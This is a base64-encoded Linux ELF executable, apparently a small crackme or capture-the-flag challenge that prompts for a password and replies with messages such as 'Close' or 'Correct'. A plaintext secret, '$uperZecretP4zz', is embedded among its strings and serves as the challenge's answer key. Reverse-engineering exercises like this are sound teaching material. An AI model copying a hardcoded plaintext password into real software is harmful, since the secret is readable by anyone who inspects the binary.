AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiD7AhIiwXF LwAASIXAdAL/0EiDxAjDAAAAAAAAAAAA/zXKLwAA/yXMLwAADx9AAP8lyi8AAGgAAAAA6eD///// JcIvAABoAQAAAOnQ/////yW6LwAAaAIAAADpwP////8lei8AAGaQAAAAAAAAAAAx7UmJ0V5IieJI g+TwUFRFMcAxyUiNPc4AAAD/FS8vAAD0Zi4PH4QAAAAAAA8fQABIjT2BLwAASI0Fei8AAEg5+HQV SIsFDi8AAEiFwHQJ/+APH4AAAAAAww8fgAAAAABIjT1RLwAASI01Si8AAEgp/kiJ8EjB7j9IwfgD SAHGSNH+dBRIiwXdLgAASIXAdAj/4GYPH0QAAMMPH4AAAAAA8w8e+oA9DS8AAAB1K1VIgz26LgAA AEiJ5XQMSIs97i4AAOgp////6GT////GBeUuAAABXcMPHwDDDx+AAAAAAPMPHvrpd////1VIieVI gewgAQAASI0FmQ4AAEiJRejHRfwAAAAAx0X4AQAAAEiNBZAOAABIice4AAAAAOiv/v//SI2F4P7/ /0iJxkiNBYEOAABIice4AAAAAOih/v//SI2F4P7//0iJx+hy/v//SIP4Bg+FxQAAAA+2heD+//88 UHQZSI0FTA4AAEiJx7gAAAAA6Fn+///ptQAAAMdF9AEAAADrNotF9EiYD7aEBeD+//8PvsCD6DAB RfyLRfRImA+2hAXg/v//D77AjVDQi0X4D6/CiUX4g0X0AYN99AV+xIN9/Bh1QIF9+AAIAAB1Nw+2 heH+//88OHUWSI0F2w0AAEiJx7gAAAAA6OH9///rQEiNBc0NAABIice4AAAAAOjL/f//6ypIjQXE DQAASInHuAAAAADotf3//+sUSI0FtA0AAEiJx7gAAAAA6J/9//+4AAAAAMnDSIPsCEiDxAjDAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAIAJHVwZXJaZWNyZXRQ NHp6AEVudGVyIHBhc3N3ZDogACVzAEFsbW9zdABDb3JyZWN0AHJlYWxseSBjbG9zZQBDbG9zZQBJ bmNvcnJlY3QAAAABGwM7KAAAAAQAAADM7///dAAAAAzw//+cAAAAHPD//0QAAAAF8f//tAAAABQA AAAAAAAAAXpSAAF4EAEbDAcIkAEHEBQAAAAcAAAA0O///yIAAAAAAAAAAAAAABQAAAAAAAAAAXpS AAF4EAEbDAcIkAEAACQAAAAcAAAAUO///0AAAAAADhBGDhhKDwt3CIAAPxo7KjMkIgAAAAAUAAAA RAAAAGjv//8IAAAAAAAAAAAAAAAcAAAAXAAAAEnw//9PAQAAAEEOEIYCQw0GA0oBDAcIAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFARAAAAAAAAEBEAAAAA AAABAAAAAAAAAD8AAAAAAAAADAAAAAAAAAAAEAAAAAAAAA0AAAAAAAAAqBIAAAAAAAAZAAAAAAAA ANA9AAAAAAAAGwAAAAAAAAAIAAAAAAAAABoAAAAAAAAA2D0AAAAAAAAcAAAAAAAAAAgAAAAAAAAA 9f7/bwAAAACgAwAAAAAAAAUAAAAAAAAAoAQAAAAAAAAGAAAAAAAAAMgDAAAAAAAACgAAAAAAAACv AAAAAAAAAAsAAAAAAAAAGAAAAAAAAAAVAAAAAAAAAAAAAAAAAAAAAwAAAAAAAADoPwAAAAAAAAIA AAAAAAAASAAAAAAAAAAUAAAAAAAAAAcAAAAAAAAAFwAAAAAAAABoBgAAAAAAAAcAAAAAAAAAqAUA AAAAAAAIAAAAAAAAAMAAAAAAAAAACQAAAAAAAAAYAAAAAAAAAPv//28AAAAAAAAACAAAAAD+//9v AAAAAGgFAAAAAAAA////bwAAAAABAAAAAAAAAPD//28AAAAAUAUAAAAAAAD5//9vAAAAAAMAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA4D0AAAAAAAAAAAAAAAAAAAAAAAAAAAAANhAAAAAAAABGEAAAAAAAAFYQAAAAAAAA AAAAAAAAAAAgQAAAAAAAAEdDQzogKERlYmlhbiAxMi4yLjAtMSkgMTIuMi4wAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAACQAAAAEABAB8AwAAAAAAACAA AAAAAAAAEwAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAHgAAAAIADwCgEAAAAAAAAAAAAAAAAAAAIAAA AAIADwDQEAAAAAAAAAAAAAAAAAAAMwAAAAIADwAQEQAAAAAAAAAAAAAAAAAASQAAAAEAGgAoQAAA AAAAAAEAAAAAAAAAVQAAAAEAFQDYPQAAAAAAAAAAAAAAAAAAfAAAAAIADwBQEQAAAAAAAAAAAAAA AAAAiAAAAAEAFADQPQAAAAAAAAAAAAAAAAAApwAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAEwAAAAQA 8f8AAAAAAAAAAAAAAAAAAAAArgAAAAEAEwAoIQAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAA AAAAAAAAAAAAvAAAAAEAFgDgPQAAAAAAAAAAAAAAAAAAxQAAAAAAEgBUIAAAAAAAAAAAAAAAAAAA 2AAAAAEAGADoPwAAAAAAAAAAAAAAAAAA7gAAABIAAAAAAAAAAAAAAAAAAAAAAAAACwEAACAAAAAA AAAAAAAAAAAAAAAAAAAAXAEAACAAGQAYQAAAAAAAAAAAAAAAAAAAJwEAABAAGQAoQAAAAAAAAAAA AAAAAAAALgEAABICEACoEgAAAAAAAAAAAAAAAAAANAEAABIAAAAAAAAAAAAAAAAAAAAAAAAARwEA ABIAAAAAAAAAAAAAAAAAAAAAAAAAWgEAABAAGQAYQAAAAAAAAAAAAAAAAAAAZwEAACAAAAAAAAAA AAAAAAAAAAAAAAAAdgEAABECGQAgQAAAAAAAAAAAAAAAAAAAgwEAABEAEQAAIAAAAAAAAAQAAAAA AAAAkgEAABAAGgAwQAAAAAAAAAAAAAAAAAAAYAEAABIADwBwEAAAAAAAACIAAAAAAAAAlwEAABAA GgAoQAAAAAAAAAAAAAAAAAAAowEAABIADwBZEQAAAAAAAE8BAAAAAAAAqAEAABIAAAAAAAAAAAAA AAAAAAAAAAAAwQEAABECGQAoQAAAAAAAAAAAAAAAAAAAzQEAACAAAAAAAAAAAAAAAAAAAAAAAAAA 5wEAACIAAAAAAAAAAAAAAAAAAAAAAAAAAgIAABICDAAAEAAAAAAAAAAAAAAAAAAAAFNjcnQxLm8A X19hYmlfdGFnAGNydHN0dWZmLmMAZGVyZWdpc3Rlcl90bV9jbG9uZXMAX19kb19nbG9iYWxfZHRv cnNfYXV4AGNvbXBsZXRlZC4wAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eF9maW5pX2FycmF5X2VudHJ5 AGZyYW1lX2R1bW15AF9fZnJhbWVfZHVtbXlfaW5pdF9hcnJheV9lbnRyeQBmaWxlLmMAX19GUkFN RV9FTkRfXwBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX0dMT0JBTF9PRkZTRVRfVEFCTEVf AF9fbGliY19zdGFydF9tYWluQEdMSUJDXzIuMzQAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxl 